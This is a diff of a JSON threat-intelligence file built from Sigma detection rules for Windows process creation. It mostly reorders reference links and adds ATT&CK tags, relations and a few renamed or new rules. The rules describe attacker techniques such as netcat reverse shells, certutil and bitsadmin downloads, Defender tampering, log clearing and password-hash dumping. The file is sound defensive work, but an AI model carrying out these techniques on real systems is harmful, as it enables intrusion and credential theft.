@@ -69954,8 +71085,8 @@ "logsource.product": "windows", "refs": [ "https://www.revshells.com/", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://nmap.org/ncat/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1095/T1095.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_netcat.yml" ], "tags": [ @@ -69988,11 +71119,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", - "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://lolbas-project.github.io/lolbas/Binaries/Certutil/", + "https://forensicitguy.github.io/agenttesla-vba-certutil-download/", + "https://news.sophos.com/en-us/2021/04/13/compromised-exchange-server-hosting-cryptojacker-targeting-other-exchange-servers/", "https://twitter.com/egre55/status/1087685529016193025", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/certutil", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_certutil_download.yml" ], "tags": [ 
@@ -70059,8 +71190,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1482/T1482.md", + "https://posts.specterops.io/an-introduction-to-manual-active-directory-querying-with-dsquery-and-ldapsearch-84943c13d7eb?gi=41b97a644843", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_dsquery_domain_trust_discovery.yml" ], "tags": [ @@ -70093,9 +71224,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://ss64.com/ps/foreach-object.html", "https://ss64.com/nt/for.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1018/T1018.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_network_scan_loop.yml" ], "tags": [ @@ -70160,8 +71291,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://eqllib.readthedocs.io/en/latest/analytics/6bc283c4-21f2-4aed-a05c-a9a3ffa95dd4.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.005/T1218.005.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mshta_javascript.yml" ], "tags": [ 
@@ -70327,8 +71458,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://h.43z.one/ipconverter/", "https://twitter.com/Yasser_Elsnbary/status/1553804135354564608", + "https://h.43z.one/ipconverter/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_obfuscated_ip_download.yml" ], "tags": [ @@ -70427,8 +71558,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://github.com/swagkarna/Defeat-Defender-V1.2.0", + "https://www.elevenforum.com/t/video-guide-how-to-completely-disable-microsoft-defender-antivirus.14608/page-2", "https://thedfirreport.com/2022/03/21/apt35-automates-initial-access-using-proxyshell/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_reg_windows_defender_tamper.yml" ], @@ -70462,9 +71593,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", - "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", "https://kb.acronis.com/content/60892", + "https://4sysops.com/archives/creating-a-complete-memory-dump-without-a-blue-screen/", + "https://learn.microsoft.com/en-us/sysinternals/downloads/livekd", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sysinternals_livekd_kernel_memory_dump.yml" ], "tags": [ 
@@ -70510,8 +71641,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", + "https://thedfirreport.com/2020/10/08/ryuks-return/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_susp_process_creation.yml" ], "tags": [ @@ -70568,9 +71699,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.trustwave.com/en-us/resources/blogs/spiderlabs-blog/chm-badness-delivers-a-banking-trojan/", "https://github.com/elastic/protections-artifacts/commit/746086721fd385d9f5c6647cada1788db4aea95f#diff-27939090904026cc396b0b629c8e4314acd6f5dac40a676edbc87f4567b47eb7", - "https://www.ptsecurity.com/ww-en/analytics/pt-esc-threat-intelligence/higaisa-or-winnti-apt-41-backdoors-old-and-new/", "https://www.zscaler.com/blogs/security-research/unintentional-leak-glimpse-attack-vectors-apt37", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_hh_susp_execution.yml" ], @@ -70686,8 +71817,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://twitter.com/Oddvarmoe/status/1641712700605513729", + "https://learn.microsoft.com/en-gb/windows-server/administration/windows-commands/ksetup", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ksetup_password_change_computer.yml" ], "tags": [ 
@@ -70712,11 +71843,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", + "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://gist.github.com/fovtran/ac0624983c7722e80a8f5a4babb170ee", "https://learn.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1070.001/T1070.001.md", - "https://jdhnet.wordpress.com/2017/12/19/changing-the-location-of-the-windows-event-logs/", - "https://eqllib.readthedocs.io/en/latest/analytics/5b223758-07d6-4100-9e11-238cfdd0fe97.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_eventlog_clear.yml" ], "tags": [ @@ -70978,8 +72109,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/GhostPack/Seatbelt", + "https://www.bluetangle.dev/2022/08/fastening-seatbelt-on-threat-hunting.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_seatbelt.yml" ], "tags": [ @@ -71096,9 +72227,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", - "https://www.echotrail.io/insights/search/regsvr32.exe", "https://redcanary.com/blog/intelligence-insights-april-2022/", + "https://www.echotrail.io/insights/search/regsvr32.exe", + "https://www.ired.team/offensive-security/code-execution/t1117-regsvr32-aka-squiblydoo", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regsvr32_susp_child_process.yml" ], "tags": [ 
@@ -71119,9 +72250,9 @@ "value": "Potentially Suspicious Child Process Of Regsvr32" }, { - "description": "Detects LOLBINs executing from an abnormal drive such as a mounted ISO.", + "description": "Detects LOLBINs executing from an abnormal or uncommon drive such as a mounted ISO.", "meta": { - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti'", + "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Angelo Violetti - SEC Consult '@angelo_violetti', Aaron Herman", "creation_date": "2022/01/25", "falsepositive": [ "Rare false positives could occur on servers with multiple drives." @@ -71131,8 +72262,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://sec-consult.com/blog/detail/bumblebee-hunting-with-a-velociraptor/", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://www.scythe.io/library/threat-emulation-qakbot", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_lolbin_exec_from_non_c_drive.yml" ], @@ -71141,7 +72272,7 @@ ] }, "uuid": "d4ca7c59-e9e4-42d8-bf57-91a776efcb87", - "value": "LOLBIN From Abnormal Drive" + "value": "LOLBIN Execution From Abnormal Drive" }, { "description": "Detects the rare use of the command line tool shutdown to logoff a user", @@ -71223,8 +72354,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_insecure_custom_source.yml" ], "tags": [ 
@@ -71291,8 +72422,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://eqllib.readthedocs.io/en/latest/analytics/d8db43cf-ed52-4f5c-9fb3-c9a4b95a0b56.html", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1053.002/T1053.002.md", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_at_interactive_execution.yml" ], "tags": [ @@ -71358,10 +72489,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://isc.sans.edu/diary/22264", "https://lolbas-project.github.io/lolbas/Binaries/Bitsadmin/", "https://blog.netspi.com/15-ways-to-download-a-file/#bitsadmin", "https://www.cisa.gov/uscert/ncas/alerts/aa22-321a", - "https://isc.sans.edu/diary/22264", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/ransomware-hive-conti-avoslocker", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_bitsadmin_download_file_sharing_domains.yml" ], @@ -71405,10 +72536,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", - "https://twitter.com/nao_sec/status/1530196847679401984", "https://app.any.run/tasks/f420d295-0457-4e9b-9b9e-6732be227583/", "https://app.any.run/tasks/713f05d2-fe78-4b9d-a744-f7c133e3fafb/", + "https://twitter.com/nao_sec/status/1530196847679401984", + "https://app.any.run/tasks/c4117d9a-f463-461a-b90f-4cd258746798/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sdiagnhost_susp_child.yml" ], "tags": [ 
@@ -71452,8 +72583,20 @@ "https://twitter.com/mrd0x/status/1481630810495139841?s=12", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_executable_invalid_extension.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.t1218.011" + ] }, + "related": [ + { + "dest-uuid": "045d0922-2310-4e60-b5e4-3302302cb3c5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "c3a99af4-35a9-4668-879e-c09aeb4f2bdf", "value": "Rundll32 Execution Without DLL File" }, @@ -71505,8 +72648,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/0gtweet/status/1588815661085917186?cxt=HHwWhIDUyaDbzYwsAAAA", - "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://www.netspi.com/blog/technical/network-penetration-testing/decrypting-iis-passwords-to-break-out-of-the-dmz-part-2/", + "https://www.elastic.co/guide/en/security/current/microsoft-iis-service-account-password-dumped.html", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_iis_appcmd_service_account_password_dumped.yml" ], "tags": [ @@ -71539,8 +72682,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://twitter.com/GelosSnake/status/934900723426439170", "https://asec.ahnlab.com/en/39828/", + "https://twitter.com/GelosSnake/status/934900723426439170", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_system_exe_anomaly.yml" ], "tags": [ 
@@ -71641,8 +72784,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1047/T1047.md", + "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wmic", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wmic_recon_service.yml" ], "tags": [ @@ -71708,9 +72851,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://symantec-enterprise-blogs.security.com/blogs/threat-intelligence/shuckworm-russia-ukraine-military", "https://learn.microsoft.com/en-us/windows/win32/shell/csidl", - "https://www.virustotal.com/gui/file/91ba814a86ddedc7a9d546e26f912c541205b47a853d227756ab1334ade92c3f", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_script_exec_from_env_folder.yml" ], "tags": [ @@ -71825,8 +72968,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://speakerdeck.com/heirhabarov/hunting-for-powershell-abuse?slide=66", + "https://2019.offzone.moscow/ru/report/hunting-for-powershell-abuses/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_cmdline_reversed_strings.yml" ], "tags": [ 
@@ -71933,8 +73076,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/nasbench/Misc-Research/tree/b9596e8109dcdb16ec353f316678927e507a5b8d/LOLBINs/Winget", + "https://learn.microsoft.com/en-us/windows/package-manager/winget/source", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winget_add_custom_source.yml" ], "tags": [ @@ -72179,10 +73322,10 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", "https://youtu.be/5mqid-7zp8k?t=2481", - "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://peterjson.medium.com/reproducing-the-proxyshell-pwn2own-exploit-49743a4ea9a1", + "https://blog.orange.tw/2021/08/proxylogon-a-new-attack-surface-on-ms-exchange-part-1.html", + "https://m365internals.com/2022/10/07/hunting-in-on-premises-exchange-server-logs/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_mailboxexport_share.yml" ], "tags": [ @@ -72206,8 +73349,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://gist.github.com/api0cradle/cdd2d0d0ec9abb686f0e89306e277b8f", + "https://lolbas-project.github.io/lolbas/Binaries/Regedit/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_regedit_import_keys.yml" ], "tags": [ 
@@ -72308,8 +73451,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://forums.veeam.com/veeam-backup-replication-f2/recover-esxi-password-in-veeam-t34630.html", + "https://thedfirreport.com/2021/12/13/diavol-ransomware/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_sqlcmd_veeam_dump.yml" ], "tags": [ @@ -72346,8 +73489,39 @@ "https://processhacker.sourceforge.io/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_pua_process_hacker.yml" ], - "tags": "No established tags" + "tags": [ + "attack.defense_evasion", + "attack.discovery", + "attack.persistence", + "attack.privilege_escalation", + "attack.t1622", + "attack.t1564", + "attack.t1543" + ] }, + "related": [ + { + "dest-uuid": "e4dc8c01-417f-458d-9ee0-bb0617c1b391", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "22905430-4901-4c2a-84f6-98243cb173f8", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + }, + { + "dest-uuid": "106c0cf6-bf73-4601-9aa8-0945c2715ec5", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], "uuid": "811e0002-b13b-4a15-9d00-a613fce66e42", "value": "PUA - Process Hacker Execution" }, 
@@ -72364,9 +73538,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", - "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", + "https://www.microsoft.com/security/blog/2022/09/07/profiling-dev-0270-phosphorus-ransomware-operations/", + "https://redacted.com/blog/bianlian-ransomware-gang-gives-it-a-go/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_net_default_accounts_manipulation.yml" ], "tags": [ @@ -72600,8 +73774,8 @@ "logsource.product": "windows", "refs": [ "https://twitter.com/vxunderground/status/1423336151860002816?s=20", - "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://pentestlab.blog/2018/07/04/dumping-domain-password-hashes/", + "https://www.virustotal.com/gui/file/03e9b8c2e86d6db450e5eceec057d7e369ee2389b9daecaf06331a95410aa5f8/detection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_cmd_shadowcopy_access.yml" ], "tags": [ @@ -72634,8 +73808,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://twitter.com/_st0pp3r_/status/1583914515996897281", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1218.007/T1218.007.md", "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/msiexec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_msiexec_execute_dll.yml" ], 
@@ -72669,8 +73843,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://twitter.com/kmkz_security/status/1220694202301976576", + "https://github.com/kmkz/Pentesting/blob/47592e5e160d3b86c2024f09ef04ceb87d204995/Post-Exploitation-Cheat-Sheet", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_mstsc_rdp_hijack_shadowing.yml" ], "tags": [ @@ -72737,9 +73911,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://www.exploit-db.com/exploits/37525", "https://community.broadcom.com/symantecenterprise/communities/community-home/digestviewer/viewthread?MessageKey=6ce94b67-74e1-4333-b16f-000b7fd874f0&CommunityKey=1ecf5f55-9545-44d6-b0f4-4e4a7f5f5e68&tab=digestviewer", - "https://community.spiceworks.com/topic/2195015-batch-script-to-uninstall-symantec-endpoint-protection", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_taskkill_sep.yml" ], "tags": [ @@ -73056,6 +74230,7 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://twitter.com/ber_m1ng/status/1397948048135778309", "https://www.cobaltstrike.com/help-opsec", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_no_params.yml" ], @@ -73074,7 +74249,7 @@ } ], "uuid": "1775e15e-b61b-4d14-a1a3-80981298085a", - "value": "Suspicious Rundll32 Without Any CommandLine Params" + "value": "Rundll32 Execution Without CommandLine Parameters" }, { "description": "Detects binaries that use the same name as legitimate sysinternals tools to evade detection", 
@@ -73133,11 +74308,11 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", + "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/how-to-add-a-data-service-reference-wcf-data-services", "https://gist.github.com/teixeira0xfffff/837e5bfed0d1b0a29a7cb1e5dbdd9ca6", "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/wcf-data-service-client-utility-datasvcutil-exe", - "https://docs.microsoft.com/en-us/dotnet/framework/data/wcf/generating-the-data-service-client-library-wcf-data-services", - "https://lolbas-project.github.io/lolbas/Binaries/DataSvcUtil/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_lolbin_data_exfiltration_by_using_datasvcutil.yml" ], "tags": [ 
@@ -73213,10 +74388,10 @@ "logsource.product": "windows", "refs": [ "https://www.trendmicro.com/content/dam/trendmicro/global/en/research/22/h/ransomware-actor-abuses-genshin-impact-anti-cheat-driver-to-kill-antivirus/Genshin%20Impact%20Figure%2010.jpg", - "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", + "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", "https://www.virustotal.com/gui/file/38283b775552da8981452941ea74191aa0d203edd3f61fb2dee7b0aea3514955", "https://www.trellix.com/en-sg/about/newsroom/stories/threat-labs/lockergoga-ransomware-family-used-in-targeted-attacks.html", - "https://github.com/redcanaryco/atomic-red-team/blob/f339e7da7d05f6057fdfcdd3742bfcf365fee2a9/atomics/T1562.001/T1562.001.md", + "https://research.nccgroup.com/2022/08/19/back-in-black-unlocking-a-lockbit-3-0-ransomware-attack/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_service_tamper.yml" ], "tags": [ @@ -73250,8 +74425,8 @@ "logsource.product": "windows", "refs": [ "https://docs.microsoft.com/en-us/windows-server/administration/windows-commands/wevtutil", - "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://abuse.io/lockergoga.txt", + "https://medium.com/palantir/tampering-with-windows-event-tracing-background-offense-and-defense-4be7ac62ac63", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_susp_etw_trace_evasion.yml" ], "tags": [ 
@@ -73394,9 +74569,9 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ + "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://redcanary.com/blog/raspberry-robin/", "https://github.com/SigmaHQ/sigma/issues/1009", - "https://www.microsoft.com/en-us/security/blog/2022/10/27/raspberry-robin-worm-part-of-larger-ecosystem-facilitating-pre-ransomware-activity/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_rundll32_susp_shellexec_execution.yml" ], "tags": [ @@ -73654,8 +74829,8 @@ "logsource.category": "process_creation", "logsource.product": "windows", "refs": [ - "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://klausjochem.me/2016/02/03/netsh-the-cyber-attackers-tool-of-choice/", + "https://blogs.msdn.microsoft.com/canberrapfe/2012/03/30/capture-a-network-trace-without-installing-anything-capture-a-network-trace-of-a-reboot/", "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_netsh_packet_capture.yml" ], "tags": [ 
@@ -73677,7 +74852,40 @@ "value": "New Network Trace Capture Started Via Netsh.EXE" }, { - "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) process patterns - suspicious parents / children, execution folders, command lines etc.", + "description": "Detects a suspicious winrar execution in a folder which is not the default installation folder", + "meta": { + "author": "Florian Roth (Nextron Systems), Tigzy", + "creation_date": "2021/11/17", + "falsepositive": [ + "Legitimate use of WinRAR in a folder of a software that bundles WinRAR" + ], + "filename": "proc_creation_win_winrar_uncommon_folder_execution.yml", + "level": "medium", + "logsource.category": "process_creation", + "logsource.product": "windows", + "refs": [ + "https://twitter.com/cyb3rops/status/1460978167628406785", + "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_winrar_uncommon_folder_execution.yml" + ], + "tags": [ + "attack.collection", + "attack.t1560.001" + ] + }, + "related": [ + { + "dest-uuid": "00f90846-cbd1-4fc5-9233-df5c2bf2a662", + "tags": [ + "estimative-language:likelihood-probability=\"almost-certain\"" + ], + "type": "related-to" + } + ], + "uuid": "4ede543c-e098-43d9-a28f-dd784a13132f", + "value": "Winrar Execution in Non-Standard Folder" + }, + { + "description": "Detects suspicious Windows Error Reporting manager (wermgr.exe) child process", "meta": { "author": "Florian Roth (Nextron Systems)", "creation_date": "2022/10/14", 
@@ -73689,15 +74897,36 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
+ "https://github.com/binderlabs/DirCreate2System",
 "https://www.echotrail.io/insights/search/wermgr.exe",
 "https://www.trendmicro.com/en_us/research/22/j/black-basta-infiltrates-networks-via-qakbot-brute-ratel-and-coba.html",
- "https://github.com/binderlabs/DirCreate2System",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_wermgr_susp_child_process.yml"
 ],
- "tags": "No established tags"
+ "tags": [
+ "attack.defense_evasion",
+ "attack.privilege_escalation",
+ "attack.t1055",
+ "attack.t1036"
+ ]
 },
+ "related": [
+ {
+ "dest-uuid": "43e7dc91-05b2-474c-b9ac-2ed4fe101f4d",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ },
+ {
+ "dest-uuid": "42e8de7b-37b2-4258-905a-6897815e58e0",
+ "tags": [
+ "estimative-language:likelihood-probability=\"almost-certain\""
+ ],
+ "type": "related-to"
+ }
+ ],
 "uuid": "396f6630-f3ac-44e3-bfc8-1b161bc00c4e",
- "value": "Suspicious WERMGR Process Patterns"
+ "value": "Suspicious Child Process Of Wermgr.EXE"
 },
 {
 "description": "Detects suspicious PowerShell invocation command parameters",
@@ -73734,9 +74963,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan",
- "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/",
 "https://www.bleepingcomputer.com/news/security/amazons-aws-ssm-agent-can-be-used-as-post-exploitation-rat-malware/",
+ "https://www.helpnetsecurity.com/2023/08/02/aws-instances-attackers-access/",
+ "https://www.mitiga.io/blog/mitiga-security-advisory-abusing-the-ssm-agent-as-a-remote-access-trojan",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_ssm_agent_abuse.yml"
 ],
 "tags": [
@@ -73770,9 +74999,9 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
- "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
- "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
 "https://docs.microsoft.com/en-us/powershell/module/dism/enable-windowsoptionalfeature?view=windowsserver2022-ps",
+ "https://learn.microsoft.com/en-us/windows/wsl/install-on-server",
+ "https://learn.microsoft.com/en-us/windows/win32/projfs/enabling-windows-projected-file-system",
 "https://github.com/SigmaHQ/sigma/tree/master/rules/windows/process_creation/proc_creation_win_powershell_enable_susp_windows_optional_feature.yml"
 ],
 "tags": [
@@ -73818,8 +75047,8 @@
 "logsource.category": "process_creation",
 "logsource.product": "windows",
 "refs": [
